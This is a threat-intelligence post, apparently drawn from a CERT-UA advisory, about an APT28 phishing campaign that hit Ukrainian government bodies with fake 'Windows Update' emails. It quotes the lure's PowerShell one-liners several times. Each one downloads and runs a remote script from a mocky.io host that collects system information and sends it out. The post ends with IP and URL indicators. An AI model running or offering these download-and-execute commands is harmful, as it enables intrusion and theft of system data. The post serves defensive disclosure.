Fancy Bear (APT28) APT IOCs - Part 3

CERT-UA в течение апреля 2023 года зафиксированы случаи распространения среди государственных органов Украины электронных писем с темой "Обновление Windows" присланных, якобы, от имени системных администраторов ведомств. При этом, электронные адреса отправителей, созданные на публичном сервисе "@outlook.com", могут формироваться с использованием настоящей фамилии и инициалов сотрудника.

Типовое письмо содержит "инструкцию" на украинском языке по "обновлению для защиты от хакерских атак", а также графические изображения процесса запуска командной строки и выполнения PowerShell-команды.

Упомянутая команда загрузит PowerShell-сценарий, который, имитируя процесс обновления операционной системы, обеспечит загрузку и выполнение следующего PowerShell-сценария, предназначенного для сбора базовой информации об ЭВМ с помощью команд "tasklist", "systeminfo", а также отправку полученных результатов с помощью HTTP запроса в API сервиса Mocky.

powershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?updateid=a4b6625c-226e-4dbc-baec-1dbd854b8015';$command='run';$version='v3';$updateid='1e88179a-3105-4a5c-9eb3-aebea36e9c21';$scheme='http://';$url=$scheme+$command+'.mocky[.]io/'+$version+'/'+$updateid;$r=(new-object system.net.webclient).downloadstring($url);powershell $r;&amp;exit
powershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?updateid=a4b6625c-226e-4dbc-baec-1dbd854b8015';$command='run';$version='v3';$updateid='3b44f33d-b6e5-4ec6-b120-99b6ac52f74b';$scheme='http://';$url=$scheme+$command+'.mocky[.]io/'+$version+'/'+$updateid;$r=(new-object system.net.webclient).downloadstring($url);powershell $r;&amp;exit
powershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?updateid=a4b6625c-226e-4dbc-baec-1dbd854b8015';$command='run';$version='v3';$updateid='ef206b51-4cf4-4c93-90bf-1e66673315b0';$scheme='http://';$url=$scheme+$command+'.mocky[.]io/'+$version+'/'+$updateid;$r=(new-object system.net.webclient).downloadstring($url);powershell$r;&amp;exit

powershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?updateid=a4b6625c-226e-4dbc-baec-1dbd854b8015';$command='run';$version='v3';$updateid='1e88179a-3105-4a5c-9eb3-aebea36e9c21';$scheme='http://';$url=$scheme+$command+'.mocky[.]io/'+$version+'/'+$updateid;$r=(new-object system.net.webclient).downloadstring($url);powershell $r;&exit

powershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?updateid=a4b6625c-226e-4dbc-baec-1dbd854b8015';$command='run';$version='v3';$updateid='3b44f33d-b6e5-4ec6-b120-99b6ac52f74b';$scheme='http://';$url=$scheme+$command+'.mocky[.]io/'+$version+'/'+$updateid;$r=(new-object system.net.webclient).downloadstring($url);powershell $r;&exit

powershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?updateid=a4b6625c-226e-4dbc-baec-1dbd854b8015';$command='run';$version='v3';$updateid='ef206b51-4cf4-4c93-90bf-1e66673315b0';$scheme='http://';$url=$scheme+$command+'.mocky[.]io/'+$version+'/'+$updateid;$r=(new-object system.net.webclient).downloadstring($url);powershell$r;&exit

Indicators of Compromise

IPv4

146.70.105.61
77.75.78.125

URLs

http://mockbin.org/bin/4aa17a07-7635-4ee0-9f3a-449fcd91f342
http://mockbin.org/bin/e8bfd045-2b14-4afc-9372-b723f7d76918
http://run.mocky.io/v3/1e88179a-3105-4a5c-9eb3-aebea36e9c21
http://run.mocky.io/v3/3b44f33d-b6e5-4ec6-b120-99b6ac52f74b
http://run.mocky.io/v3/a4b6625c-226e-4dbc-baec-1dbd854b8015
http://run.mocky.io/v3/acea62da-ca05-46d1-bb80-0b036af7467c